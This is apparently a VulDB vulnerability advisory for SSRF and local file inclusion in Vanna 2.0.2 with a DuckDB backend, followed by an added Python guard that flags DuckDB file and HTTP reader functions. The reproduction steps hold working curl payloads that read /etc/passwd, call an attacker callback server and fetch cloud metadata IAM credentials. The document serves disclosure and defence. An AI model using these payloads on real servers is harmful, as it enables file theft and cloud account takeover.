| Title | vanna-ai Vanna 2.0.2 Server-Side Request Forgery (CWE-918) |
|---|
| Description | # Technical Details
A Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) vulnerability exists in the `update_sql` and `run_sql` endpoints in `src/vanna/legacy/flask/__init__.py` of Vanna when using DuckDB as the database backend.
An unauthenticated attacker can inject arbitrary SQL containing DuckDB built-in file/HTTP functions (read_csv, read_csv_auto, read_text, read_blob) via the /api/v0/update_sql endpoint, and then trigger execution via /api/v0/run_sql. This causes the server to make HTTP requests to attacker-controlled or internal URLs (SSRF), or read arbitrary local files (LFI) and return the contents to the attacker.
# Vulnerable Code
File: src/vanna/legacy/flask/__init__.py (lines 604-648)
Method: update_sql endpoint + run_sql endpoint
Why: The update_sql endpoint stores attacker-supplied SQL without validation. DuckDB provides built-in functions like read_csv('http://...'), read_text('/etc/passwd'), read_blob('/etc/shadow') that can make HTTP requests and read local files. All payloads are valid SELECT statements that bypass the is_sql_valid() check. The default NoAuth configuration requires no authentication.
Data flow: POST /api/v0/update_sql -> cache.set(sql) -> GET /api/v0/run_sql -> vn.run_sql(sql) -> DuckDB conn.query(sql).to_df() -> DuckDB processes read_csv('http://...') -> SSRF
# Reproduction
1. Start Vanna server with DuckDB backend (default NoAuth)
2. Start attacker callback server: python3 -m http.server 18877
3. SSRF attack: curl -X POST "http://localhost:8084/api/v0/update_sql" -H "Content-Type: application/json" -d '{"id":"ssrf-test","sql":"SELECT * FROM read_csv_auto(\\u0027http://127.0.0.1:18877/probe.csv\\u0027)"}' then curl "http://localhost:8084/api/v0/run_sql?id=ssrf-test" — DuckDB sends HTTP request from server
4. LFI attack: inject sql "SELECT * FROM read_text('/etc/passwd')" — returns full file contents via API response
5. Cloud metadata theft: inject sql with read_csv_auto('http://x.x.x.x/latest/meta-data/iam/security-credentials/') — steals IAM credentials on AWS
# Impact
- SSRF: Server sends HTTP requests to arbitrary internal/external URLs (cloud metadata, internal APIs)
- Local File Inclusion: Read arbitrary files from server filesystem (/etc/passwd, secrets, configs)
- Cloud Account Takeover: Steal IAM credentials via metadata endpoint (x.x.x.x)
- Information Disclosure: Exfiltrate sensitive data through API responses |
|---|
| Source | ⚠️ https://gist.github.com/YLChen-007/574542015755951ee1d53206022cc754 |
|---|
| User | Eric-y (UID 95889) |
|---|
| Submission | 04/03/2026 08:54 AM (2 months ago) |
|---|
| Moderation | 15/03/2026 07:45 PM (11 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 351154 [vanna-ai vanna up to 2.0.2 Endpoint __init__.py update_sql/run_sql privilege escalation] |
|---|
| Points | 20 |
|---|
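
A pre-execution check for the SQL that `update_sql` stores and `run_sql` executes, as an added example that is not part of the original submission or of Vanna's code. The names `external_access_findings` and `guard_sql` are hypothetical, the sample queries are constructed from the payload shapes in the description, and the reader list extends the report's four functions with `read_parquet`, `read_json` and `read_json_auto`. It is deliberately conservative and is a first layer only; DuckDB's `enable_external_access` setting is the engine-level control.

```python
import re

# DuckDB reader functions: the four named in the report, plus read_parquet,
# read_json and read_json_auto (added here). Matching the bare name rather
# than "name(" keeps whitespace or comments before the parenthesis from
# hiding a call.
READER_FUNC = re.compile(
    r"\b(read_csv_auto|read_csv|read_text|read_blob|read_parquet|"
    r"read_json_auto|read_json)\b", re.IGNORECASE)
# Single-quoted SQL string literal ('' is an escaped quote).
LITERAL = re.compile(r"'((?:[^']|'')*)'")
# Literal that starts like a URL (scheme://) or a filesystem path. DuckDB can
# also scan a file named directly in FROM, so literals are checked everywhere.
PATH_LIKE = re.compile(r"(?:[a-z][a-z0-9+.\-]*://|/|\.{1,2}/|~/)", re.IGNORECASE)


def external_access_findings(sql: str) -> list[str]:
    """Return the reasons this SQL could reach files or the network."""
    findings = [f"function:{m.group(1).lower()}" for m in READER_FUNC.finditer(sql)]
    for m in LITERAL.finditer(sql):
        value = m.group(1).strip()
        if PATH_LIKE.match(value):
            findings.append(f"literal:{value}")
    return findings


def guard_sql(sql: str) -> str:
    """Hypothetical hook to call before storing or running user-supplied SQL."""
    findings = external_access_findings(sql)
    if findings:
        raise ValueError("SQL rejected: " + ", ".join(findings))
    return sql


# Constructed samples: the report's payload shapes plus one ordinary query.
SAMPLES = [
    "SELECT * FROM read_csv_auto('http://127.0.0.1:18877/probe.csv')",
    "SELECT * FROM read_text('/etc/passwd')",
    "SELECT name, total FROM orders WHERE status = 'shipped'",
]

if __name__ == "__main__":
    for sql in SAMPLES:
        print(external_access_findings(sql) or "allowed", "<-", sql)
```

A column or literal that happens to match (for example a stored path value) is rejected too, which is the intended trade-off for an unauthenticated endpoint.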